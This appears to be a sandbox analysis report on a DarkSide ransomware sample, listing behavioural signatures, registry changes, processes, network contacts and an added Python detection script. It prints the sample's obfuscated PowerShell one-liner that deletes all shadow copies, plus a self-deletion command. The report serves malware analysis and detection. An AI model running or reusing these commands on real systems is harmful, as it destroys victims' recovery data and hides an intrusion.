Analysis Overview
SHA256
2b2aff0f96023927c709a40c979612bbf123ec59478d7f91a06d25e55f98460b
Threat Level: Known bad
The file darkside.zip was found to be: Known bad.
Malicious Activity Summary
DarkSide
Credentials from Password Stores: Credentials from Web Browsers
Renames multiple (134) files with added filename extension
Reads user/profile data of web browsers
Credentials from Password Stores: Windows Credential Manager
Indicator Removal: File Deletion
Command and Scripting Interpreter: PowerShell
Suspicious use of NtSetInformationThreadHideFromDebugger
Sets desktop wallpaper using registry
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Browser Information Discovery
Uses Volume Shadow Copy service COM API
Suspicious behavior: EnumeratesProcesses
Modifies Control Panel
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 10:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 10:27
Reported
2024-08-06 10:29
Platform
win11-20240802-en
Max time kernel
117s
Max time network
95s
Command Line
Signatures
DarkSide
Credentials from Password Stores: Credentials from Web Browsers
Renames multiple (134) files with added filename extension
Credentials from Password Stores: Windows Credential Manager
Reads user/profile data of web browsers
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: File Deletion
Evidence is in the Processes list: the sample spawns cmd.exe with `DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL`, removing its own image once it has run. The recorded image path is C:\Windows\SysWOW64\cmd.exe although the command line names system32, i.e. WoW64 file-system redirection applied to this launch, which only happens for a 32-bit parent.
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\80caa7ac.BMP" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\80caa7ac.BMP" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.80caa7ac | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.80caa7ac\ = "80caa7ac" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\80caa7ac\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\80caa7ac | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\80caa7ac\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\80caa7ac.ico" | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
The appended extension `.80caa7ac` is registered as a file class with its own DefaultIcon, and the same 8-hex-character value names the wallpaper (80caa7ac.BMP), the icon (80caa7ac.ico) and the ransom note (README.80caa7ac.TXT). DarkSide derives this value per host, so detections should key on the pattern (an 8-hex-character extension plus matching README/BMP/ico names) rather than on this literal. The MuiCache entry written by MiniSearchHost.exe (the Windows 11 taskbar search host) is ordinary shell activity in the detonation, not behaviour of the sample.
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
This hook is installed by MiniSearchHost.exe, the Windows 11 taskbar search host, and is background shell activity rather than behaviour of the sample.
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2432 wrote to memory of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2432 wrote to memory of 1932 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2432 wrote to memory of 5288 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2432 wrote to memory of 5288 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2432 wrote to memory of 5288 | N/A | C:\Users\Admin\AppData\Local\Temp\Darkside.exe | C:\Windows\SysWOW64\cmd.exe |
Both targets are children that PID 2432 (Darkside.exe) launches itself: powershell.exe (1932) and cmd.exe (5288). A parent writing into a just-created child during process start-up trips this signature, so on its own it is not evidence of code injection into an unrelated process.
Uses Volume Shadow Copy service COM API
vssvc.exe, the VSS service, appears under Processes because it starts on demand when shadow copies are enumerated and deleted. Here that is done through WMI (Win32_ShadowCopy) from the hex-encoded PowerShell one-liner, not through vssadmin.exe, so a detection keyed only on `vssadmin delete shadows` misses this sample.
Processes
C:\Users\Admin\AppData\Local\Temp\Darkside.exe
"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
Decoded (the 62 bytes the loop reads from the hex literal): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.80caa7ac.TXT
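The PowerShell command line above and the "Uses Volume Shadow Copy service COM API" signature both come down to one obfuscated one-liner: a `(0..N)` range walking a hex literal two characters at a time, cast through `[char][byte]`, then handed to `iex`. The decoder and classifier below are an added example written for this page, not output of the sandbox or code from the DarkSide sample; the sample command line is copied verbatim from the Processes list, and the finding names (`execution_policy_bypass`, `hex_loop_obfuscation`, `shadow_copy_deletion`) are this example's own labels.

```python
import re

# Constructed sample: the powershell.exe command line recorded in this report,
# copied verbatim (the hex literal is the report's own).
SAMPLE_CMDLINE = r'''powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"'''

# Pieces of the obfuscation pattern: a (0..N) range driving a
# Substring(2*$_,2) walk over one long hex literal, then iex on the result.
RANGE_RE = re.compile(r"\(0\.\.(\d+)\)")
HEX_LITERAL_RE = re.compile(r"'0x'\+'([0-9A-Fa-f]+)'\.Substring\(2\*\$_,\s*2\)")
INVOKE_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
EP_BYPASS_RE = re.compile(r"-(ep|executionpolicy)\s+bypass", re.I)


def decode_hex_loop(cmdline: str):
    """Rebuild the string the loop assembles, honouring the (0..N) bound.

    Returns None when the command line does not carry the pattern.
    """
    r = RANGE_RE.search(cmdline)
    h = HEX_LITERAL_RE.search(cmdline)
    if not r or not h:
        return None
    count = int(r.group(1)) + 1          # (0..61) is 62 iterations
    hexstr = h.group(1)[: 2 * count]     # bytes past the bound are never read
    # [char][byte] maps each byte to the code point of the same value,
    # which is exactly what latin-1 decoding does.
    return bytes.fromhex(hexstr).decode("latin-1")


def classify(cmdline: str):
    """Return the findings (example labels) a detection rule would raise."""
    findings = []
    if EP_BYPASS_RE.search(cmdline):
        findings.append("execution_policy_bypass")
    decoded = decode_hex_loop(cmdline)
    if decoded is not None and INVOKE_RE.search(cmdline):
        findings.append("hex_loop_obfuscation")
        # The decoded payload, not the outer command line, is what names the
        # WMI shadow-copy class and calls Delete() on every instance.
        if re.search(r"win32_shadowcopy", decoded, re.I) and re.search(r"\.delete\(", decoded, re.I):
            findings.append("shadow_copy_deletion")
    return findings


if __name__ == "__main__":
    print(decode_hex_loop(SAMPLE_CMDLINE))
    print(classify(SAMPLE_CMDLINE))
```

The decoder respects the loop bound rather than decoding the whole literal, because the literal here carries one more byte (a trailing space) than the loop ever reads; matching on the decoded payload is what lets a rule catch WMI-based shadow-copy deletion that never invokes vssadmin.exe.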
Network
Apart from DNS and TLS (443) contacts to securebestapp20.com, a domain present in published DarkSide indicator lists, and background traffic to r.bing.com, the table is dominated by PTR (reverse) lookups sent to 8.8.8.8 for individual hosts in 10.127.0.0/24, the sandbox's private range, walking the subnet address by address.
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | securebestapp20.com | udp |
| US | 172.234.222.143:443 | securebestapp20.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| GB | 104.86.110.121:443 | | tcp |
| GB | 104.86.110.121:443 | | tcp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| US | 172.234.222.138:443 | securebestapp20.com | tcp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 172.234.222.138:443 | securebestapp20.com | tcp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.0.127.10.in-addr.arpa | udp |
